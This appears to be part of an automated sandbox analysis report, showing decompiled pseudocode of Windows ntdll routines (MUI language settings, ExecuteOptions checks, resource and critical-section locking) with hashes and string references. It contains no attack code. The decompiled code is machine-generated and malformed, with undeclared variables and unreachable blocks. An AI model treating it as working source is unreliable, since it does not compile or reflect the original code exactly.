                                                • Source File: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: false
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                • Instruction ID: 5ee596a1bfbfaa077a92055b3d8a9dc3091a8f25d82d4e0fe3606be2394aea5d
                                                • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                • Instruction Fuzzy Hash: 8AD0A7717503043BEA10FAA49C07F6673CD6B44B00F494074F948D73C3D964F9004565
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                C-Code - Quality: 94%
                                                			E00C98788(signed int __ecx, void* __edx, signed int _a4) {
                                                				signed int _v8;
                                                				short* _v12;
                                                				void* _v16;
                                                				signed int _v20;
                                                				char _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				char _v36;
                                                				signed int _v40;
                                                				char _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				char _v68;
                                                				void* _t216;
                                                				intOrPtr _t231;
                                                				short* _t235;
                                                				intOrPtr _t257;
                                                				short* _t261;
                                                				intOrPtr _t284;
                                                				intOrPtr _t288;
                                                				void* _t314;
                                                				signed int _t318;
                                                				short* _t319;
                                                				intOrPtr _t321;
                                                				void* _t328;
                                                				void* _t329;
                                                				char* _t332;
                                                				signed int _t333;
                                                				signed int* _t334;
                                                				void* _t335;
                                                				void* _t338;
                                                				void* _t339;
                                                
                                                				_t328 = __edx;
                                                				_t322 = __ecx;
                                                				_t318 = 0;
                                                				_t334 = _a4;
                                                				_v8 = 0;
                                                				_v28 = 0;
                                                				_v48 = 0;
                                                				_v20 = 0;
                                                				_v40 = 0;
                                                				_v32 = 0;
                                                				_v52 = 0;
                                                				if(_t334 == 0) {
                                                					_t329 = 0xc000000d;
                                                					L49:
                                                					_t334[0x11] = _v56;
                                                					 *_t334 =  *_t334 | 0x00000800;
                                                					_t334[0x12] = _v60;
                                                					_t334[0x13] = _v28;
                                                					_t334[0x17] = _v20;
                                                					_t334[0x16] = _v48;
                                                					_t334[0x18] = _v40;
                                                					_t334[0x14] = _v32;
                                                					_t334[0x15] = _v52;
                                                					return _t329;
                                                				}
                                                				_v56 = 0;
                                                				if(E00C98460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_v56 = 1;
                                                					if(_v8 != 0) {
                                                						_t207 = E00C7E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                					}
                                                					_push(1);
                                                					_v8 = _t318;
                                                					E00C9718A(_t207);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_v60 = _v60 | 0xffffffff;
                                                				if(E00C98460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
                                                					_t333 =  *_v8;
                                                					_v60 = _t333;
                                                					_t314 = E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					_push(_t333);
                                                					_v8 = _t318;
                                                					E00C9718A(_t314);
                                                					_t335 = _t335 + 4;
                                                				}
                                                				_t216 = E00C98460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
                                                				_t332 = ";";
                                                				if(_t216 < 0) {
                                                					L17:
                                                					if(E00C98460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
                                                						L30:
                                                						if(E00C98460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
                                                							L46:
                                                							_t329 = 0;
                                                							L47:
                                                							if(_v8 != _t318) {
                                                								E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                							}
                                                							if(_v28 != _t318) {
                                                								if(_v20 != _t318) {
                                                									E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                									_v20 = _t318;
                                                									_v40 = _t318;
                                                								}
                                                							}
                                                							goto L49;
                                                						}
                                                						_t231 = _v24;
                                                						_t322 = _t231 + 4;
                                                						_push(_t231);
                                                						_v52 = _t322;
                                                						E00C9718A(_t231);
                                                						if(_t322 == _t318) {
                                                							_v32 = _t318;
                                                						} else {
                                                							_v32 = E00C7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                						}
                                                						if(_v32 == _t318) {
                                                							_v52 = _t318;
                                                							L58:
                                                							_t329 = 0xc0000017;
                                                							goto L47;
                                                						} else {
                                                							E00C72340(_v32, _v8, _v24);
                                                							_v16 = _v32;
                                                							_a4 = _t318;
                                                							_t235 = E00C8E679(_v32, _t332);
                                                							while(1) {
                                                								_t319 = _t235;
                                                								if(_t319 == 0) {
                                                									break;
                                                								}
                                                								 *_t319 = 0;
                                                								_t321 = _t319 + 2;
                                                								E00C7E2A8(_t322,  &_v68, _v16);
                                                								if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                								_v16 = _t321;
                                                								_t235 = E00C8E679(_t321, _t332);
                                                								_pop(_t322);
                                                							}
                                                							_t236 = _v16;
                                                							if( *_v16 != _t319) {
                                                								E00C7E2A8(_t322,  &_v68, _t236);
                                                								if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
                                                									_a4 = _a4 + 1;
                                                								}
                                                							}
                                                							if(_a4 == 0) {
                                                								E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
                                                								_v52 = _v52 & 0x00000000;
                                                								_v32 = _v32 & 0x00000000;
                                                							}
                                                							if(_v8 != 0) {
                                                								E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
                                                							}
                                                							_v8 = _v8 & 0x00000000;
                                                							_t318 = 0;
                                                							goto L46;
                                                						}
                                                					}
                                                					_t257 = _v24;
                                                					_t322 = _t257 + 4;
                                                					_push(_t257);
                                                					_v40 = _t322;
                                                					E00C9718A(_t257);
                                                					_t338 = _t335 + 4;
                                                					if(_t322 == _t318) {
                                                						_v20 = _t318;
                                                					} else {
                                                						_v20 = E00C7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                					}
                                                					if(_v20 == _t318) {
                                                						_v40 = _t318;
                                                						goto L58;
                                                					} else {
                                                						E00C72340(_v20, _v8, _v24);
                                                						_v16 = _v20;
                                                						_a4 = _t318;
                                                						_t261 = E00C8E679(_v20, _t332);
                                                						_t335 = _t338 + 0x14;
                                                						while(1) {
                                                							_v12 = _t261;
                                                							if(_t261 == _t318) {
                                                								break;
                                                							}
                                                							_v12 = _v12 + 2;
                                                							 *_v12 = 0;
                                                							E00C7E2A8(_v12,  &_v68, _v16);
                                                							if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                							_v16 = _v12;
                                                							_t261 = E00C8E679(_v12, _t332);
                                                							_pop(_t322);
                                                						}
                                                						_t269 = _v16;
                                                						if( *_v16 != _t318) {
                                                							E00C7E2A8(_t322,  &_v68, _t269);
                                                							if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
                                                								_a4 = _a4 + 1;
                                                							}
                                                						}
                                                						if(_a4 == _t318) {
                                                							E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                							_v40 = _t318;
                                                							_v20 = _t318;
                                                						}
                                                						if(_v8 != _t318) {
                                                							E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                						}
                                                						_v8 = _t318;
                                                						goto L30;
                                                					}
                                                				}
                                                				_t284 = _v24;
                                                				_t322 = _t284 + 4;
                                                				_push(_t284);
                                                				_v48 = _t322;
                                                				E00C9718A(_t284);
                                                				_t339 = _t335 + 4;
                                                				if(_t322 == _t318) {
                                                					_v28 = _t318;
                                                				} else {
                                                					_v28 = E00C7E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                				}
                                                				if(_v28 == _t318) {
                                                					_v48 = _t318;
                                                					goto L58;
                                                				} else {
                                                					E00C72340(_v28, _v8, _v24);
                                                					_v16 = _v28;
                                                					_a4 = _t318;
                                                					_t288 = E00C8E679(_v28, _t332);
                                                					_t335 = _t339 + 0x14;
                                                					while(1) {
                                                						_v12 = _t288;
                                                						if(_t288 == _t318) {
                                                							break;
                                                						}
                                                						_v12 = _v12 + 2;
                                                						 *_v12 = 0;
                                                						E00C7E2A8(_v12,  &_v68, _v16);
                                                						if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                						_v16 = _v12;
                                                						_t288 = E00C8E679(_v12, _t332);
                                                						_pop(_t322);
                                                					}
                                                					_t296 = _v16;
                                                					if( *_v16 != _t318) {
                                                						E00C7E2A8(_t322,  &_v68, _t296);
                                                						if(E00C95553(_t328,  &_v68,  &_v36) != 0) {
                                                							_a4 = _a4 + 1;
                                                						}
                                                					}
                                                					if(_a4 == _t318) {
                                                						E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                						_v48 = _t318;
                                                						_v28 = _t318;
                                                					}
                                                					if(_v8 != _t318) {
                                                						E00C7E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                					}
                                                					_v8 = _t318;
                                                					goto L17;
                                                				}
                                                			}


                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 00C989FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 00C987E6
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00C98914
                                                • Kernel-MUI-Language-Allowed, xrefs: 00C98827
                                                • WindowsExcludedProcs, xrefs: 00C987C1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 64%
                                                			E00CA7EFD(void* __ecx, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v540;
                                                				unsigned int _v544;
                                                				signed int _v548;
                                                				intOrPtr _v552;
                                                				char _v556;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t33;
                                                				void* _t38;
                                                				unsigned int _t46;
                                                				unsigned int _t47;
                                                				unsigned int _t52;
                                                				intOrPtr _t56;
                                                				unsigned int _t62;
                                                				void* _t69;
                                                				void* _t70;
                                                				intOrPtr _t72;
                                                				signed int _t73;
                                                				void* _t74;
                                                				void* _t75;
                                                				void* _t76;
                                                				void* _t77;
                                                
                                                				_t33 =  *0xd52088; // 0x768113a1
                                                				_v8 = _t33 ^ _t73;
                                                				_v548 = _v548 & 0x00000000;
                                                				_t72 = _a4;
                                                				if(E00CA7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                					__eflags = _v548;
                                                					if(_v548 == 0) {
                                                						goto L1;
                                                					}
                                                					_t62 = _t72 + 0x24;
                                                					E00CC3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                					_t71 = 0x214;
                                                					_v544 = 0x214;
                                                					E00C7DFC0( &_v540, 0, 0x214);
                                                					_t75 = _t74 + 0x20;
                                                					_t46 =  *0xd54218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                					__eflags = _t46;
                                                					if(_t46 == 0) {
                                                						goto L1;
                                                					}
                                                					_t47 = _v544;
                                                					__eflags = _t47;
                                                					if(_t47 == 0) {
                                                						goto L1;
                                                					}
                                                					__eflags = _t47 - 0x214;
                                                					if(_t47 >= 0x214) {
                                                						goto L1;
                                                					}
                                                					_push(_t62);
                                                					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                					E00CC3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                					_t52 = E00C80D27( &_v540, L"Execute=1");
                                                					_t76 = _t75 + 0x1c;
                                                					_push(_t62);
                                                					__eflags = _t52;
                                                					if(_t52 == 0) {
                                                						E00CC3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                						_t71 =  &_v540;
                                                						_t56 = _t73 + _v544 - 0x218;
                                                						_t77 = _t76 + 0x14;
                                                						_v552 = _t56;
                                                						__eflags = _t71 - _t56;
                                                						if(_t71 >= _t56) {
                                                							goto L1;
                                                						} else {
                                                							goto L10;
                                                						}
                                                						while(1) {
                                                							L10:
                                                							_t62 = E00C88375(_t71, 0x20);
                                                							_pop(_t69);
                                                							__eflags = _t62;
                                                							if(__eflags != 0) {
                                                								__eflags = 0;
                                                								 *_t62 = 0;
                                                							}
                                                							E00CC3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                							_t77 = _t77 + 0x10;
                                                							E00CEE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                							__eflags = _t62;
                                                							if(_t62 == 0) {
                                                								goto L1;
                                                							}
                                                							_t31 = _t62 + 2; // 0x2
                                                							_t71 = _t31;
                                                							__eflags = _t71 - _v552;
                                                							if(_t71 >= _v552) {
                                                								goto L1;
                                                							}
                                                						}
                                                					}
                                                					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                					_push(3);
                                                					_push(0x55);
                                                					E00CC3F92();
                                                					_t38 = 1;
                                                					L2:
                                                					return E00C7E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                				}
                                                				L1:
                                                				_t38 = 0;
                                                				goto L2;
                                                			}


                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00CC3F12
                                                Strings
                                                • Execute=1, xrefs: 00CC3F5E
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00CC3F75
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 00CCE345
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00CC3EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00CCE2FB
                                                • ExecuteOptions, xrefs: 00CC3F04
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00CC3F4A
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                • Opcode ID: 591aaece4408b8663c241e0710175165dff27d2e243131ec532108941cedcab1
                                                • Instruction ID: 74e347c4f21dbda7ca3c3d929d696a679d9dad09f55cb3daadb4fa384db80c88
                                                • Opcode Fuzzy Hash: 591aaece4408b8663c241e0710175165dff27d2e243131ec532108941cedcab1
                                                • Instruction Fuzzy Hash: 5D411732A8030D7ADF20AAD4DCC6FEA73BCAF15704F0045ADF119E6081EA70AB459B61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E00C953A5(signed int _a4, char _a8) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t32;
                                                				signed int _t37;
                                                				signed int _t40;
                                                				signed int _t42;
                                                				void* _t45;
                                                				intOrPtr _t46;
                                                				signed int _t49;
                                                				void* _t51;
                                                				signed int _t57;
                                                				signed int _t64;
                                                				signed int _t71;
                                                				void* _t74;
                                                				intOrPtr _t78;
                                                				signed int* _t79;
                                                				void* _t85;
                                                				signed int _t86;
                                                				signed int _t92;
                                                				void* _t104;
                                                				void* _t105;
                                                
                                                				_t64 = _a4;
                                                				_t32 =  *(_t64 + 0x28);
                                                				_t71 = _t64 + 0x28;
                                                				_push(_t92);
                                                				if(_t32 < 0) {
                                                					_t78 =  *[fs:0x18];
                                                					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                						goto L3;
                                                					} else {
                                                						__eflags = _t32 | 0xffffffff;
                                                						asm("lock xadd [ecx], eax");
                                                						return 1;
                                                					}
                                                				} else {
                                                					L3:
                                                					_push(_t86);
                                                					while(1) {
                                                						L4:
                                                						__eflags = _t32;
                                                						if(_t32 == 0) {
                                                							break;
                                                						}
                                                						__eflags = _a8;
                                                						if(_a8 == 0) {
                                                							__eflags = 0;
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                							_t79 = _t64 + 0x24;
                                                							_t71 = 1;
                                                							asm("lock xadd [eax], ecx");
                                                							_t32 =  *(_t64 + 0x28);
                                                							_a4 = _t32;
                                                							__eflags = _t32;
                                                							if(_t32 != 0) {
                                                								L19:
                                                								_t86 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                									asm("sbb esi, esi");
                                                									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00d501c0;
                                                									_push(_t92);
                                                									_push(0);
                                                									_t37 = E00C6F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                									__eflags = _t37 - 0x102;
                                                									if(_t37 != 0x102) {
                                                										break;
                                                									}
                                                									_t71 =  *(_t92 + 4);
                                                									_t85 =  *_t92;
                                                									_t51 = E00CB4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                									_push(_t85);
                                                									_push(_t51);
                                                									E00CC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                									E00CC3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                									_t86 = _t86 + 1;
                                                									_t105 = _t104 + 0x28;
                                                									__eflags = _t86 - 2;
                                                									if(__eflags > 0) {
                                                										E00CF217A(_t71, __eflags, _t64);
                                                									}
                                                									_push("RTL: Re-Waiting\n");
                                                									_push(0);
                                                									_push(0x65);
                                                									E00CC3F92();
                                                									_t104 = _t105 + 0xc;
                                                								}
                                                								__eflags = _t37;
                                                								if(__eflags < 0) {
                                                									_push(_t37);
                                                									E00CB3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                									asm("int3");
                                                									_t40 =  *_t71;
                                                									 *_t71 = 0;
                                                									__eflags = _t40;
                                                									if(_t40 == 0) {
                                                										L1:
                                                										_t42 = E00C95384(_t92 + 0x24);
                                                										if(_t42 != 0) {
                                                											goto L31;
                                                										} else {
                                                											goto L2;
                                                										}
                                                									} else {
                                                										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                										_push( &_a4);
                                                										_push(_t40);
                                                										_t49 = E00C6F970( *((intOrPtr*)(_t92 + 0x18)));
                                                										__eflags = _t49;
                                                										if(__eflags >= 0) {
                                                											goto L1;
                                                										} else {
                                                											_push(_t49);
                                                											E00CB3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                											L31:
                                                											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                											_push( &_a4);
                                                											_push(1);
                                                											_t42 = E00C6F970( *((intOrPtr*)(_t92 + 0x20)));
                                                											__eflags = _t42;
                                                											if(__eflags >= 0) {
                                                												L2:
                                                												return _t42;
                                                											} else {
                                                												_push(_t42);
                                                												E00CB3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                												_push( &_a4);
                                                												_push(1);
                                                												_t42 = E00C6F970( *((intOrPtr*)(_t92 + 0x20)));
                                                												__eflags = _t42;
                                                												if(__eflags >= 0) {
                                                													goto L2;
                                                												} else {
                                                													_push(_t42);
                                                													_t45 = E00CB3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                													asm("int3");
                                                													while(1) {
                                                														_t74 = _t45;
                                                														__eflags = _t45 - 1;
                                                														if(_t45 != 1) {
                                                															break;
                                                														}
                                                														_t86 = _t86 | 0xffffffff;
                                                														_t45 = _t74;
                                                														asm("lock cmpxchg [ebx], edi");
                                                														__eflags = _t45 - _t74;
                                                														if(_t45 != _t74) {
                                                															continue;
                                                														} else {
                                                															_t46 =  *[fs:0x18];
                                                															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                															return _t46;
                                                														}
                                                														goto L37;
                                                													}
                                                													E00C95329(_t74, _t92);
                                                													_push(1);
                                                													return E00C953A5(_t92);
                                                												}
                                                											}
                                                										}
                                                									}
                                                								} else {
                                                									_t32 =  *(_t64 + 0x28);
                                                									continue;
                                                								}
                                                							} else {
                                                								_t71 =  *_t79;
                                                								__eflags = _t71;
                                                								if(__eflags > 0) {
                                                									while(1) {
                                                										_t57 = _t71;
                                                										asm("lock cmpxchg [edi], esi");
                                                										__eflags = _t57 - _t71;
                                                										if(_t57 == _t71) {
                                                											break;
                                                										}
                                                										_t71 = _t57;
                                                										__eflags = _t57;
                                                										if(_t57 > 0) {
                                                											continue;
                                                										}
                                                										break;
                                                									}
                                                									_t32 = _a4;
                                                									__eflags = _t71;
                                                								}
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									goto L19;
                                                								}
                                                							}
                                                						}
                                                						goto L37;
                                                					}
                                                					_t71 = _t71 | 0xffffffff;
                                                					_t32 = 0;
                                                					asm("lock cmpxchg [edx], ecx");
                                                					__eflags = 0;
                                                					if(0 != 0) {
                                                						goto L4;
                                                					} else {
                                                						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                						return 1;
                                                					}
                                                				}
                                                				L37:
                                                			}

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CD22F4
                                                Strings
                                                • RTL: Resource at %p, xrefs: 00CD230B
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00CD22FC
                                                • RTL: Re-Waiting, xrefs: 00CD2328
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: d8b41d7780ab7404d81e3290bd20f2d1d439a4da41b6dd481fb06d0c6ecd3fc6
                                                • Instruction ID: cab12f6b42d5bf86dbfac65b3bbf975951f4bb98bea98ea74c7a48317a8fc6ca
                                                • Opcode Fuzzy Hash: d8b41d7780ab7404d81e3290bd20f2d1d439a4da41b6dd481fb06d0c6ecd3fc6
                                                • Instruction Fuzzy Hash: 55510571600B066BDF159F68DC85FA6739CEF54360F10422AFE18DB291EA61ED4297A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E00C9EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				signed int _v24;
                                                				intOrPtr* _v28;
                                                				intOrPtr _v32;
                                                				signed int _v36;
                                                				intOrPtr _v40;
                                                				short _v66;
                                                				char _v72;
                                                				void* __esi;
                                                				intOrPtr _t38;
                                                				intOrPtr _t39;
                                                				signed int _t40;
                                                				intOrPtr _t42;
                                                				intOrPtr _t43;
                                                				signed int _t44;
                                                				void* _t46;
                                                				intOrPtr _t48;
                                                				signed int _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t53;
                                                				signed char _t67;
                                                				void* _t72;
                                                				intOrPtr _t77;
                                                				intOrPtr* _t80;
                                                				intOrPtr _t84;
                                                				intOrPtr* _t85;
                                                				void* _t91;
                                                				void* _t92;
                                                				void* _t93;
                                                
                                                				_t80 = __edi;
                                                				_t75 = __edx;
                                                				_t70 = __ecx;
                                                				_t84 = _a4;
                                                				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                					E00C8DA92(__ecx, __edx, __eflags, _t84);
                                                					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                				}
                                                				_push(0);
                                                				__eflags = _t38 - 0xffffffff;
                                                				if(_t38 == 0xffffffff) {
                                                					_t39 =  *0xd5793c; // 0x0
                                                					_push(0);
                                                					_push(_t84);
                                                					_t40 = E00C716C0(_t39);
                                                				} else {
                                                					_t40 = E00C6F9D4(_t38);
                                                				}
                                                				_pop(_t85);
                                                				__eflags = _t40;
                                                				if(__eflags < 0) {
                                                					_push(_t40);
                                                					E00CB3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                					asm("int3");
                                                					while(1) {
                                                						L21:
                                                						_t76 =  *[fs:0x18];
                                                						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                							_v66 = 0x1722;
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_t76 =  &_v72;
                                                							_push( &_v72);
                                                							_v28 = _t85;
                                                							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(0x10);
                                                							_push(0x20402);
                                                							E00C701A4( *0x7ffe0382 & 0x000000ff);
                                                						}
                                                						while(1) {
                                                							_t43 = _v8;
                                                							_push(_t80);
                                                							_push(0);
                                                							__eflags = _t43 - 0xffffffff;
                                                							if(_t43 == 0xffffffff) {
                                                								_t71 =  *0xd5793c; // 0x0
                                                								_push(_t85);
                                                								_t44 = E00C71F28(_t71);
                                                							} else {
                                                								_t44 = E00C6F8CC(_t43);
                                                							}
                                                							__eflags = _t44 - 0x102;
                                                							if(_t44 != 0x102) {
                                                								__eflags = _t44;
                                                								if(__eflags < 0) {
                                                									_push(_t44);
                                                									E00CB3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                									asm("int3");
                                                									E00CF2306(_t85);
                                                									__eflags = _t67 & 0x00000002;
                                                									if((_t67 & 0x00000002) != 0) {
                                                										_t7 = _t67 + 2; // 0x4
                                                										_t72 = _t7;
                                                										asm("lock cmpxchg [edi], ecx");
                                                										__eflags = _t67 - _t67;
                                                										if(_t67 == _t67) {
                                                											E00C9EC56(_t72, _t76, _t80, _t85);
                                                										}
                                                									}
                                                									return 0;
                                                								} else {
                                                									__eflags = _v24;
                                                									if(_v24 != 0) {
                                                										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                									}
                                                									return 2;
                                                								}
                                                								goto L36;
                                                							}
                                                							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                							_push(_t67);
                                                							_t46 = E00CB4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                							_push(_t77);
                                                							E00CC3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                							_t48 =  *_t85;
                                                							_t92 = _t91 + 0x18;
                                                							__eflags = _t48 - 0xffffffff;
                                                							if(_t48 == 0xffffffff) {
                                                								_t49 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                							}
                                                							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                							_push(_t49);
                                                							_t50 = _v12;
